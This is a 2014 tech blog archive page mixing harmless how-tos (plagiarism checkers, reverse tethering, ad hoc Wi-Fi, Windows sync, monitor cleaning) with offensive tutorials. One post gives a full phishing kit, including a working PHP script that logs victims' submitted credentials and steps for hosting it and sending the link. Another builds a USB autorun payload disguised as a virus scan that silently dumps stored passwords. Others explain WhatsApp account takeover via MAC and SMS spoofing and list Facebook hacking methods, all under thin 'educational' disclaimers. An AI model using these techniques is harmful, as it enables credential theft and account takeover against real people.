Followers

Sunday, 7 September 2014

How to Find the Websites or Blogs that are Copying your Content

How to Find the Websites or Blogs that are Copying your Content


The websites or blogs that copy your content are actually committing Black-Hat SEO, which is something that Google punishes sites for. The trouble is that Google does not know who the duplicator is, and so will often punish both sites for duplicate content. This means that if another person copies your content, then they are also dragging your website down with them too. Added to this, is the insult that you have invested time (or money) into your web content, and now somebody else has come along and is stealing it.

CopyScape is a very good plagiarism checker

It is good because it has a reasonable mix of economy and quality. The truth is that there are some better plagiarism checkers out there, but they are very expensive when compared to CopyScape. On the other hand, do not let price fool you. There are some plagiarism checkers out there that are far more expensive than CopyScape and yet are not nearly as good as CopyScape.
This is a tool that you can use which will check the search engines for your content. The truth is that if the duplicate (plagiarized) content is not indexed by Google or Bing, then CopyScape is not going to find it. However, if Google or Bing has not indexed your plagiarized content yet, then there should not be any search engine penalizations.
You can check up to 2000 words in one go, and it only costs 5c. Or, you can load a number of text-filled documents into a batch search and it will check them all for you. It keys in on chains of three words. It also has a tolerance of around 5%. This is because some websites are going to have chains of three words that are the same as yours; however, if this occurs for more than 5% of the page, the CopyScape tool will show you a result. This does sometimes produce false positives, but they are few and far between.

CopySentry can stand guard over your content

If you are concerned that people are going to steal your content, then you can have CopySentry run a check on your chosen web pages every week. It is a tool offered by CopyScape, and it means that you will not have to keep running plagiarism checks manually. Also, as you can imagine, there is a small service charge for doing this, but CopyScape allows you to buy credit so that you will not have to make a payment every time it runs a check. CopyScape takes PayPal payments too, so you do not have to worry about entering your card details.

CopyScape free URL searches

Every day you are able to run five free searches on the URLs of your choice. That means that if you were so inclined, you could check 35 pages per week for free. The tool will check the entire page and then show the pages that have been copied by others. If it does find copied content, the results it gives are pretty good. It will show you how many domains have the content, and you can click on the link to see what parts are copied from your website (or content). It will tell you how much of the page has copied content via a percentage, and it will highlight any copied content in red.
Google your own topics to look for plagiarism

When somebody re-writes your content or copies your content and hides it from the plagiarism checkers (it can be done), they are often uncreative in choosing a new title. All you need to do is Google your own page titles to see what turns up. Hopefully, you will see your own page riding high in the search engine results. Look around the search engine for articles with similar titles, and you may just come across your article that has been hidden from the plagiarism checkers.

You will have trouble finding spun content

This is true because according to a web crawler and plagiarism checker, if an article has been spun then it is new. Of course, it is not new by human standards, and if you are unlucky enough to read it then you will see that it makes very little sense and that it flows as well as syrup from a coffee filter. Nevertheless, for some reason people still do it, and it is possible to file a cease and desist order if you find content that has been spun from your content because it is still plagiarism.
About Author:
Kate Funk coaches individuals in SEO and business networking skills at Tutortop.

source:-thecrazyprogrammer.com


How to Download and Install Turbo C++ for Windows XP

How to Download and Install Turbo C++ for Windows XP







C++ a must demanded software for computer freaks,but most of our visitors (mostly xp users) were complaining that they could not find the right place to download it ,or were having many problems in installing it
so we are again here with just click one downloading program c++ for you



   - Click Here to Download Turbo C++ for Windows XP -

How to Install Turbo C++ for Windows Xp

1. First of all download the compiler from the link given above.
2. Now extract the zip file and than open TC3SETUP.
3. After that click on Unzip. You can also change the path where you want to install it.
 
Turbo C++ for Windows XP - How to Download and Install 
4. By default it is installed in C:\TC.
5. You have done!! Please share and like it.


----------------------------------------------


http://comphow.blogspot.in/
follow us and share

Sunday, 31 August 2014

Use your PC’s Internet in Android via USB





Tethering is the ability to browse on your PC using the 3G/2G connectivity of your Android mobile, and Android reverse tethering is the reverse of that: i.e surfing on your phone using your PC's internet. While this can be achieved using a portable WiFi hotspot, in this case no WiFi or 3G connection is required.
NOTE : This work only for rooted users !!!

Installation :

For Installing The tool :-Go to This Site

http://tech4bros.com/android-reverse-tethering-how-to-connect-pc-internet-to-android-mobile/


Steps:-

1.Turn on USB debugging on your Android mobile. Settings > Applications > Development > USB Debugging > Turn On

 Screenshot_2013-12-12-18-50-40

2.Download the Android Reverse Tethering Tool. Extract and then open it.


3.Open AndroidTool.exe in the Android Reverse Tethering Folder


Android reverse tethering 1.jpg


4.Refresh and select your device.

use pc's internet in android

5.Choose a DNS to be used. Check the DNS (you can use Google DNS 8.8.8.8 , 8.8.4.4),or a defaylt DNs for your pc internet will automatically shown after opening the tool

6.Install Hack Connectivity. Some applications like the Play Store require an active connection, so you have to fool the system into thinking it is connected to WiFi.


Android reverse tethering 2.jpg

its not compulsary
,like if one wanna use whatsapp,browsers,and stuffs like that

7.Install or update the Xposed Framework. Hack Connectivity is a module of Xposed Framework.

8.Check the Hack Connectivity Service under the modules menu. Restart your mobile.
11 11 46 21A925C7_BB.jpg


9.Restart and open the Hack Connectivity Service. Hit the WiFi Button

10.Now click the Connect button in the Android reverse tethering Tool.


Enjoy..


5 12 2014 5 43 53 PM Android reverse tethering   How to Connect PC Internet to Android Mobile


-------------------------------------------------------------------------------------------------------

if you are having problemnm with connecting ,so follow this simple way ......just you need to download the same tool and open it

Start reverse tethering:

Just click “Connect”.
If it’s the first time you use the program, This will install the latest android package and the dependencies (busybox and redsocks).
The Superuser process may ask you to allow “Usb tunnel”
use pc's internet in android
If the android process crash after receiving superuser rights, close the windows program and start again.
The android interface (first tab) will show connections forwarded to windows.
Others tabs are just for debugging (give information about system route tables and connections). Not yet finished.



If You Have any Problem , reach us by feedback in bottom of site  we will Help You





Saturday, 5 July 2014

All About Phishing Scam And Hacking

All About Phishing Scam And Hacking





we are discussing the easiest way of hacking an Email account i'e Phishing scam . Definition of phishing, what is a phishing scam, how it works and how to hack an email account using phishing scam more efficiently.
Phishing scam is one of the easiest and the oldest way of hacking an email account. All beginner hackers should know about this.so lets go for it

Read this post carefully and leave your Feedback and queries in comments .
and please follow our blog, and also follow us on g+.


Firtly Lets See What is Phishing?

 In simple language phishing scam is creating fake pages to steal user credentials like username,password,phone no,etc.


Steps:-
1) First you need a Phisher. Phisher is a set of files used to fool someone .It consist of:-
i) Web page which appears to be same as that of victims account site.
i) A php script which posts the data (credentials)into a text file
iii) Text file in which credentials are saved.

2) Creating a Phisher?
2.1) Creating exact copy of the login page of site: Open that site in your bowser ,rightclick any where in free space and then click on view source.
2.2) Copy the entire source to notepad.

2.3)Editing source code :

Press“Ctrl+a” then “ctrl+f” (select all+find ) , then a dialogue box will appear , type “action”(without quotes) and press enter.
The word action will be highlighted in the notepad.You will then be having a line saying:
**action=”http://www.facebook.com/login.php?login_attempt=1″**
2.4)Change this with **action=”post.php”**(double quotes are necessary),and save
it as index.html.

2.5)Creating a Phishing script
:

    <?php
    header ('Location: http://www.myhost.com/errorpage.html');
    $handle = fopen("usernames.txt", "a");
    foreach($_POST as $variable => $value)
    {
       fwrite($handle, $variable);
       fwrite($handle, "=");
       fwrite($handle, $value);
       fwrite($handle, "\r\n");
    }
    fwrite($handle, "\r\n");
    fclose($handle);
    exit;
    ?>

    copy the code to notepad and change**’Location:http://www.myhost.com/errorpage.html’**
    with the url of the site you want to open after victim presses “Login” button like if you want your victim to be redirected to yahoo.com change **‘Location:http://www.yahoo.com/’**
    and save it as “post.php”.

    2.6) Create a log file: It is a file which contains all usernames and passwords . Open
    notepad and save it as **usernames.txt**.

    3) Now you need a free web hosting account .you can easily find some free hosts on google or try these:-
    zymic.com
    t35.com
    my3 gb.com
    Create account on any of these sites for free hosting plan.
    4)After creating account just upload the three files to your web hosting account.
    5)You are ready for the attack.Just send the link of your index.html to the victim.
    If he opens and tries to login , id and password will be saved in the usernames.txt file.

    6) Additional step:
    You can hide URL by encrypting it using online URL encrypters like
    is.gd
    goo.gl
    tinyurl.com
    Go to any one of the above mentioned sites, enter your URL and
    then it will encrypt the URL , copy the encrypted URL and then send it to Your Friends.

    Logic:
    Index.html : It is the exact copy of the Login page of a site.While editing it , we change “action=post.php” so when ever victim clicks on the Login button , Post.php will be executed.
    Post.php: It is our phishing script, it takes the data and writes it to a text file , and then loads another page specified by the “location” tag in Php file.
    usernames.txt : text file containing Passwords and Email id.

    Prevention :
    >Always check the Url before signing in . This is the most useful and effective way one can use to prevent himself from phishing .
    >Other way is to use some good Antivirus software which warns you whenever you visit a harmful site.
    Even if somehow you entered your credentials in a phisher, Immediately Change your password .

    NOTE:-This tutorial is for educational purpose only,Use at your own risk. How to Hack discourages email account hacking using phishing scams for illegal purposes.
    comp_how.ltd is not responsible for any type of loss caused due to this information!!

    Keep Visiting How to Hack


    http://comphow.blogspot.in/
                                   


Wednesday, 2 July 2014

6 Easiest Ways to hack a Facebook Account

1) Phishing :
The first and very basic way of hacking Facebook accounts is via Phishing. Phishing is actually creating fake web pages to steal user’s credentials like email,passwords,phone no,etc.

DRAWBACK :

Users nowadays are aware of these type of attacks and one can not be easily fooled using this attack. You need some social engineering or some social skills to trick someone.

Prevention :

  • Always check the page URL before logging in. This is the most trusted and effective way one can use to avoid himself from phishing.


  • Other way is to use some good Antivirus software which will warn you if  you visit a harmful phishing page.
    Even if somehow you have already entered your credentials in a phisher, Immediately Change your password.

2) Keylogging :
This is another good way of hacking Facebook accounts. In this type of attack a hacker simply sends an infected file having keylogger in it to the victim. If the victim executes that file on his pc, whatever he types will be mailed/uploaded to hacker’s server. The advantage of this attack is that the victim won’t know that hacker is getting every Bit of data he is typing. Another big advantage is that hacker will get passwords of all the accounts used on that PC.

DRAWBACK :
Keyloggers are often detected as threats by good antiviruses. Hacker must find a way to protect it from antivirus.
Prevention :

  • Execute the file only if you trust the sender.
  • Use online scanner such as novirusthanks.org
  • Use good antivirus and update it regularly .


3) Trojans/backdoors :
This is an advanced level topic. It consists of a server and a client. In this type of attack the attacker sends the infected server to the victim. After execution the infected server i.e. Trojan on the victim’s PC opens a backdoor and now the hacker can do whatever he wants with the victim’s PC .

DRAWBACK :

Trojans are often detected as threats by good antiviruses. Hacker must find a way to protect it from antivirus.

Prevention :

  • Execute the file only if you trust the sender.
  • Use online scanner such as novirusthanks.org
  • Use good antivirus and update it regularly .



    4)Sniffing
    It consists of stealing session in progress. In this type of attack an attacker makes connection with server and client and relays message between them, making them believe that they are talking to each other directly.
    DRAWBACK :
  • If user is logged out then attacker is also logged out and the session is lost.
  • It is difficult to sniff on SSL protected networks.

          Prevention :

  • Always use SSL secured connections.
  • Always keep a look at the url if the http:// is not changed to https:// it means that sniffing is active on your network.




    5)Social Engineering :
    This method includes guessing and fooling the clients to give their own passwords. In this type of attack, a hacker sends a fake mail which is very convincing and appealing and asks the user for his password.
    Answering the security questions also lies under this category.
    Drawback :
    It is not easy to convince someone to make him give his password.
    Guessing generally doesn’t always work ( Although if you are lucky enough it may work!).

    Prevention :

  • Never give your password to anyone
  • Don’t believe in any sort of emails which asks for your password

6) Session Hijacking
In a session hijacking attack an attacker steals victims cookies, cookies stores all the necessary logging Information about one’s account, using this info an attacker can easily hack anybody’s account. If you get the cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Facebook, Google, Yahoo.
Drawbacks :
  • You will be logged out when user is logged out.
  • You will not get the password of the user’s account.
  • Will not work if the user is using HTTPS connections.

Prevention :

  • Always work on SSL secured connections.
  • Always keep a look at the url if the http:// is not changed to https:// it means that sniffing is active on your network.

Keep visiting comp how and Learn hacking .
Leave your feedback and queries in commentsat end of site in contact/feedback .


http://comphow.blogspot.in/




How to sniff Passwords using USB Drive




Anyone can steal stored passwords from any computer and that too by using your USB drive.

Can’t believe!


Read on..

As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit.


MessenPass
:
Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE Passview
:
IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0


Protected Storage PassView
:
Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…


PasswordFox
:
PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.
Here is a step by step procedre to create the password hacking toolkit.
NOTE: You must temporarily disable your antivirus before following these steps.

1.
Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.
ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2.
Create a new Notepad and write the following text into it
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy the autorun.inf file onto your USB pendrive.

3.
Create another Notepad and write the following text onto it.
start mspass.exe /stext mspass.txtstart mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
save the Notepad and rename it from
New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP and Vista
http://comphow.blogspot.in/



http://comphow.blogspot.in/

Tuesday, 1 July 2014

How to hack Whatsapp account

How to hack Whatsapp account





About Whatsapp

Though I am pretty sure most of you might be knowing about whatsapp but still here is a brief into about the same.
Whatsapp Messenger is a cross platform quick messaging application. Whatsapp is assured really the foremost fashionable quick electronic messaging for smartphones. Whatsapp Messenger is accessible for iPhone, Android, Windows Phone, Blackberry and Nokia and yes, those phones can all message each other. And you all have heard of it if you are not using it. Given below are the several whatsapp hacks or tricks you should know if you are using whatsapp.

Whatsapp hack to spy on some other account

So if all of you have noticed you cannot have your whatsapp account logged in two devices. Means session is given to only one MAC address. If the MAC (Media Access Control) address of the device seeking access changes then whatsapp asks you to again verify your account.

How to Hack Whatsapp Account

All you need is to get access to victim phone to get the victims phone “MAC address along with the verifying massage” which is acquired to verify your device.
  • Get mac address on your android phone.
  • Finding MAC address on an Android Phones
  • On your phone’s home screen, click on menu, then go to setting.
  • Click on about phone.
  • Click on the status.
  • And then view your Wi-Fi MAC address.
  • As soon the message is received Push the MAC address as well as Verifying code to your server or mail it your ID. That banks on your convince.
  • Cheat your phone’s MAC address to the Victims address and install whatsapp and after that type the verify code.
  • And now its done. You get full access to the victim’s whatsapp ID. So now you can keep spying/watching your victim’s movements.
  • That means you and the victim is using the same ID from different devices.
  • Whatsapp hack to use it by not using your number
  • This hack works by cheating the Whatsapp Verification Servers by sending a spoofed request for an authorisation code expected for a different phone.
  • Install Whatsapp on your device. Whatsapp now opens a counter where it sends a verification message to its servers.
  • Block the message service – it can be blocked by changing the message centre number or turning the phone into Airplane mode.
Whatsapp now gives a substitute method of verification – Select verify through SMS and fill in your email address. Once you click to send the SMS press cancel to abort the call for authorisation to the Whatsapp server.
  • Now you have to do sms Spoofing.
  • Examine your outbox and copy the message details into the spoofer application and send the spoofed verification.
  • You will now receive messages expected for the spoofed number on your mobile device and you can communicate with people under the spoofed number.

Note:- This information has been shared to create awareness among people regarding the “Ways to Hack Whatsapp” so that you can protect yourself from getting hacked. In no way do we promote misusing of the information.
Now that you know How to Hack Whatsapp account, you are good to protect yours.




http://comphow.blogspot.in/







Saturday, 28 June 2014

All About Apple USB Modem




What Macintosh computers are compatible with the Apple USB modem?

The Apple USB modem requires Mac OS X v10.4.3 through Mac OS X v10.6.8 running in 32 bit mode. If your Mac has an earlier version of Mac OS X v10.4, upgrade your computer's operating system using Apple Downloads or Software Update.

Important: The Apple USB modem is not supported with OS X Lion or later.

Can I use the Apple USB modem if my Macintosh already has an internal modem?

Yes, but you can only use one modem at a time. Make sure you've selected External Modem in the Internet Connect application if you want to use your Apple USB modem instead of your computer's internal modem. The Apple USB modem's preferences can be seen in the Network pane of System Preferences. From the Show menu, select External Modem.

Does the Apple USB modem work on Windows machines?

The Apple USB Modem is not supported on computers running any version of the Microsoft Windows operating system.

Will the Apple USB modem work when attached to the USB port of an ADC display or when attached to an external USB hub?

It is not recommended to attach the Apple USB modem to the USB port of an ADC display or to an external USB hub. This modem works most reliably when connected directly to your computer.

How fast does the Apple USB modem operate?

The Apple USB modem's maximum speed is 56 kilobits per second (kbps) for data transmission and 14.4kbps for FAX. The speed the modem operates at depends greatly on the quality of the phone line transmission, so speeds may vary.


What standards does the Apple USB modem support?

The Apple USB modem is K56 Flex compliant, and supports the V.92 protocol, supporting caller ID (if enabled on the phone line), wake on ring, and telephone answering (V.253) on hold.
Compatible ISP and telephone services required.Your ISP may not support all V.92 features. Modem will function according to V.90 standards if V.92 services are not available.

What comes in the Apple USB modem box?

The box contains an Apple USB Modem with built-in 4.6-inch USB cable and a User Guide.


http://comphow.blogspot.in/



Making a wireless home network connection in Windows XP without a router



Wirelessly networking a second or third computer without a wireless router or a standalone wireless access point (WAP) is considered an ad hoc wireless network. You can build an ad hoc 802.11b wireless network using the graphical user interface in Windows XP. Here's how to add Internet Connection Sharing on the host computer and set up an ad hoc wireless network

Configuring the host computer

You'll first need to install an 802.11b wireless card in the main computer and configure it as a computer-to-computer (ad hoc) wireless connection. After you install an 802.11b adapter on a computer, Windows XP will automatically detect the card, install drivers, and display an icon in the notification area. If the computer is in an environment where other wireless networks are in range, Windows should display a list of available networks automatically. However, if no wireless networks are in range, the wireless connection icon may display a red “X” and may not automatically open a View Wireless Networks window. To open this window, click the icon for the wireless connection.

Do not select an available network at this time if any are displayed in the Available networks listing. If your computer previously connected to a preferred access point, remove all preferred access points. This will ensure that a connection is made only to the ad hoc network that you are trying to configure.
Click the Advanced tab at the top of the window. Select Computer to computer (ad hoc) networks only and clear the Automatically connect to non-preferred networks box if it is selected. This setting, along with removing preferred networks, ensures connection to the ad hoc network only.
Click the Wireless Networks tab again. Under Preferred Networks, click Add. In the Wireless Network Properties dialog box, specify a Network name (SSID). Use any name desired, but be sure to use it to configure all computers. Note that the network type is already marked as a computer-to-computer network and that this cannot be changed since it has already been specified that a connection should be made to only ad hoc networks.

After configuring the network name (SSID) in the Wireless Network Properties dialog box, the new ad hoc network will be displayed with a PC Card icon to designate that this is a computer-to-computer network

.

Configuring a client computer

After installing an 802.11b Silver PC Card in a second computer, the Wireless Networks tab displays a list of in-range wireless access points or ad hoc wireless networks.

The new ad hoc network should be listed. Highlight the network name, and then click Configure. Because WEP will not be configured at this time, click OK

Sharing the connection

Follow these steps to share the connection:
  1. Click Start, click Control Panel, click Switch to classic view, and then click Network Connections.
  2. Click the connection to be shared, and then, under Network Tasks, click Change settings of this connection.
  3. Click the Advanced tab, and then select the Allow other network users to connect through this computer's Internet connection check box.
  4. If you are not using a third-party firewall and have not already set up the Internet Connection Firewall, select the Internet Connection Firewall (ICF) check box to enable this feature.
  5. Enable the setting to let other users control or enable this connection.
After completing ICF configuration, the Network Connection window on the host computer will display the original wired Ethernet connection and display the status as Shared as well as Enabled. The Network Connection window on the client computer will display the connection on the host as an Internet Gateway.
The client computer(s) should now receive a private class, non-routable IP address in the 192.168.0.* address range via DHCP from the host computer and should have full Internet connectivity.

Configuring WEP

If connectivity has now been established successfully, return to Network Properties and configure WEP settings to ensure security for the ad hoc network.

On the host computer, open the Wireless Network Properties dialog box and select the Data encryption (WEP enabled) check box. Consult the documentation provided by your wireless card manufacturer for the key format and key length.

Use the highest level of encryption possible (key length) that is supported by your hardware and drivers. Be sure that if you use an ASCII network key that you pick random characters and letters that can't be easily guessed. The final step is to use the same key and encryption settings and configure the client computer(s).

Must Note

.


Pinning apps to your taskbar in windows 8.1

Pinning apps to your taskbar in windows 8.1

Whether you're using touch or a mouse, you can pin any app to your taskbar so it's easy to open when you're in the desktop.

Step 1

On the Start screen, slide up from the middle of the screen to see the Apps view. (If you’re using a mouse, click the arrow The arrow button near the lower-left corner of the screen.)
Apps view


Step 2

Press and hold or right-click to select the apps you want to pin. (To select multiple apps with a mouse, press and hold Ctrl and then right-click each app.)
Select apps


Step 3

Tap or click Pin to taskbar.
Pin apps to taskbar

--------------------------------------------------------------------------------
Pinning apps you have open

If you're already using an app, you can pin it to the taskbar without going to the Start screen.

Step 1

Press and hold the app's taskbar button and slide your finger up until a menu appears. (If you're using a mouse, right-click the app button on the taskbar.)
Jump list


Step 2

Tap or click Pin this program to taskbar. The app you pinned will stay on your taskbar even after you close the app.
Pin to taskbar

Switching between apps on the taskbar

When you're using an app, you can bring up the taskbar to quicky switch back to a different app or to go back to Start.
To see the taskbar when you're using an app that takes up the whole screen, move your mouse pointer below the bottom edge of the screen. Then, click the Start button to go back to Start, or click another app button to switch to a different app.




How to keep your information in sync in windows


How to keep your information in sync in windows



(Note

here we are talking about windows os)

Keeping track of all your information can become a chore if you keep your files in different locations. Perhaps you store some files on a computer, others in folders on a network server, and still others on mobile devices such as portable music players, personal digital assistants (PDAs), or mobile phones.
How can you be certain you’re working with the most recent versions of your files when you have copies scattered everywhere? And how can you make sure you have all the files you want on the computer, server, or mobile devices you use without spending a lot of time copying files manually? The easiest and most efficient way is to sync your files automatically using Sync Center.

What is sync?

In Windows, sync (short for synchronization) is the process of keeping files in two or more locations matched with each other.
Sync can be one way or two way. In one-way sync, every time you add, change, or delete a file or other information in one location, the same information is added, changed, or deleted in the other location. But no changes are ever made to the first location because the sync is only one way.
In two-way sync, files are copied in both directions, keeping files in sync in two locations. Every time you add, change, or delete a file in either location, the same change is made in the other sync location. It doesn't matter whether you made the changes on a computer, a mobile device, or a folder on a network server; the same changes will be made in both locations. Two-way sync is commonly used in work environments, where files are often updated in more than one location and then synced with other locations.


Where do I go to sync?

Sync Center is the place to go to sync your computer with network folders, mobile devices, and compatible programs. Sync Center can automatically keep your files and folders in sync in different locations.
Open Sync Center by clicking the Start button Picture of the Start button, clicking All Programs, clicking Accessories, and then clicking Sync Center.

How difficult is it to set up sync?In the past, the sync process was so complex that many people relied on a system administrator to set up sync for them. With Sync Center, you can do it yourself. There are no server settings to worry about, even if you sync with a folder on a network server. All you have to do is tell Sync Center what files and folders you want to sync, where to sync them, and when. This set of rules—which represents a partnership between two or more sync locations—is called a sync partnership.

How does sync work?

Every time you sync files between two locations (such as between a computer and a mobile device), Sync Center compares the files in both locations to see if they still match or if any have changed. It determines if any files need to be updated in order to stay in sync.
  • If the files differ, Sync Center determines which version of each file to keep and copies that version to the other location, overwriting the other version there. It selects the most recent version to keep, unless you have set up the sync partnership to sync differently.
  • If a file has changed in both locations since the last sync, Sync Center flags this as a sync conflict and asks you to choose which version to keep.
  • If the files are identical in both locations, Sync Center does nothing because the files are already in sync.
  • If you have added a new file in one location but not the other, Sync Center will copy the file to the other location.
  • If you have deleted a file from one location but not the other, Sync Center will delete the file from the other location.

What are some of the different ways I can sync?

The following scenarios illustrate several of the most common and useful ways to keep your information in sync. Using Sync Center, you can sync:
  • Music stored on a portable music player and music stored on a computer. You store your main collection of music on your computer, and you want to make sure that any music you add to or delete from your computer is also added to or deleted from your portable player. But you don't want any songs you delete from your portable player to be deleted from your computer, so you create a one-way sync partnership between your computer and music player. If you add or delete any music on your computer, Sync Center will add or delete the same songs on your music player.
  •   Files stored on a computer and in a network folder. You work collaboratively with your colleagues on a set of documents stored on a network server. You set up an Offline Files sync partnership with this network folder. Now any time you disconnect your computer from the network or the server loses its network connection, you can continue working on those files without interruption. The next time you reconnect to the network folder, any changes you have made are also made to the files in the network folder.

    Now one of most offten question you should ask yourself before syncronising

    How often can I sync?You can schedule Sync Center to sync your partnerships as often as you want. You can schedule an automatic sync on a daily, weekly, or monthly basis, or when a specific event occurs, such as every time you log on to your computer. You can also perform a manual sync at any time, such as when you are getting ready to disconnect a mobile PC from the network and want to make sure you have the latest copies of files on a network server.


    Note

    • The ability to sync with network folders is not included in Windows Vista Starter, Windows Vista Home Basic, and Windows Vista Home Premium.

---------------------------------------------------------------------
    http://comphow.blogspot.in/







Monday, 23 June 2014

How to Back Up or Transfer Files Between SFTP and Dropbox Using Backup Box

How to Back Up or Transfer Files Between SFTP and Dropbox Using Backup Box

Backup Box has re-branded and is now called Mover. Moving files from SFTP to Dropbox can be a menial task. If you use a service called Mover, the entire process can be streamlined with a few clicks.

------------------------------------------------------------

Steps

Mover 1.png
1.Use a tool called Mover. This is a website built entirely to help people transfer files between different services.


                          *************************
Logintomover.PNG
2.Quickly create an account on Mover by entering your preferred email and password.

                                          ***********************************

Select Source.PNG
3.Click the "Select Source" and the "+New" buttons to add a new connector

                                            **************************************

SFTP Connector.png

4
.Choose SFTP. Enter your server credentials

                                 ***************************************

SFTP files.png
5.Browse to the folder that you wish to transfer. You can also choose the root if you like. This will transfer the directory you have chosen and everything within it.

                                             ***************************************

Dropbox Connector.png
6.Authorize your Dropbox account by clicking "Select Destination" Choose Dropbox and a new tab will open and you will have to enter your Dropbox account details. Pick a friendly name, and then click "Add this connector". Allow the Mover app to connect to your Dropbox.

                                                  *************************************

Wikihow Dropbox Destination.PNG
7.Browse to the folder where you wish to receive your files.

                                               ***************************************

Archive3.PNG
8.Choose whether you want to archive and timestamp this transfer. This is useful for backups.

                                           ****************************************

Transfernow.PNG
9.It's time to set your transfer in motion! Review everything to make sure that all of your settings are correct. Then finalize the transfer by clicking the "Transfer now" button at the middle center of the screen. You will be given a prompt to accept the transfer, and once you agree, the files will start to move.

                                             **************************************

Schedulelater.PNG
10.You can also schedule this transfer to happen automatically at a later date.

                                           *****************************************

http://comphow.blogspot.in/


How to Clean a Computer Monitor

How to Clean a Computer Monitor



Dirt, fingerprints, and unsightly scratches can make a monitor unpleasant to use. It's important to use a gentle cleaning method, as monitors are made with a type of plastic than can be easily scratched by rough cleaning or harsh chemicals. This article will show you how to clean your computer monitor without causing any damage, and fix scratches, if necessary.
------------------------------------------------------------------

Part 1 of 2: Cleaning Your Monitor Safely

1.Turn off the monitor. It's easier to see the dust and dirt when the monitor is off, and safer for you and your computer.
  • If you try to clean the monitor while the pixels are firing you may end up damaging the screen.
  • While the risk is small, there is the possibility of an electric shock if you clean the monitor while it’s on.

                              
    ********************************                                                  
2.Clean the frame. Spray windex or another gentle cleaning solution onto a clean cloth and use it to wipe the casing around the screen.

  • The casing is made with durable plastic, so it's fine to scrub a little if you need to remove bits of grime.
  • Don't spray the cleaner directly onto the casing, since you might accidentally get some on the screen, and some of it might drip into crevices and get inside.
  • Clean the monitor's base, the buttons, and the back of the monitor. Wrap a corner of the cloth around your finger or a toothpick to clean out the hard-to-reach crevices.
  • If your monitor has any cords attaching it to the CPU or power, unplug these and give them a good cleaning too.

                                            *********************************
    3.Wipe the monitor with a clean, soft piece of fabric. Microfiber cloth is ideal. This type of anti-static cloth doesn't leave a lint residue on the screen, and it's soft enough that it won't scratch the surface. Wipe off any visible dust, dirt and grime with the cloth.
  • Don't use towels, paper products or other scratchy cloth to wipe the screen. These will leave lint and may cause scratches.
  • Disposable dusting cloths, such as Swiffer cloths also work well.
  • Don't press hard on the screen or try to scrub it. You might damage it and cause discoloration to occur next time you turn it on.
  • If your screen is very dirty, rinse or change the cloth in-between passes. Clean gently and gradually.

                                            **********************************

    4.Avoid using ammonia or acetone-based products. These can easily damage your screen, especially if it has a matte, anti-glare finish.
  • Use plain water as much as possible to wipe your screen.
  • Consider buying a specifically formulated screen cleaning fluid. Read reviews and check your users manual to make sure which are safe for your particular monitor.
  • For a mild homemade cleaner, mix water and white vinegar in equal proportions. Use this to dampen (not wet) your cleaning cloth.
  • Alternately, mix vodka or isopropyl alcohol in equal amounts for another homemade cleaner.
  • Always apply any liquid to the cloth, not directly to the screen, to prevent dripping.
  • Don’t use anything soapy that can leave a residue.

                                            ***********************************


                                                                               


    5.Consider using screen wipes. These are convenient and specifically designed for monitors.
  • Make sure they are gentle enough for anti-glare screens, if you have one.
  • Read reviews online or ask a salesperson to find a good brand.







                                               ***********************************

    6.For stubborn stains, gently wipe the spot on the screen. Use a gentle, circular rubbing motion to remove the spot, whether it's sticky food residue, ink or another substance.
  • Don't rub or scrub too hard.
  • Be patient; it might take a few moments for the solution to soak into the spot enough to adequately remove it.
  • To help the solution soak in, hold the dampened cloth over the spot for a little while.
  • Avoid the temptation to spray the solution directly onto the screen if the spot is stubborn.
  • When the spot has been removed, wipe the area dry with a clean part of the cloth.

                                               ************************************
    7.Make sure everything is dry before turning on your monitor. This prevents any moisture that may have gotten into your monitor from causing damage, or electrical shock.

                                              *************************************
                                              *************************************

    Part 2 of 2: Fixing Scratches



    1.Check your warranty. If your monitor has a scratch, you may be able to get it replaced.
    • Check the warranty that came with your monitor to find out what your options are.
    • Once you start trying to repair the scratch yourself, further damage may no longer be covered by your warranty.

                         *****************

    2.Buy a scratch repair kit. Computer stores and computer sections of department stores sell scratch repair kits for LCD monitors.
    • Check online reviews to find out the best formulation for your particular scratch.
    • Follow the instructions for applying the scratch solution to your screen.

                                        ********************************

      3
      .Try petroleum jelly for a temporary fix. Use a cotton swab to apply a thin layer of jelly over the scratch.
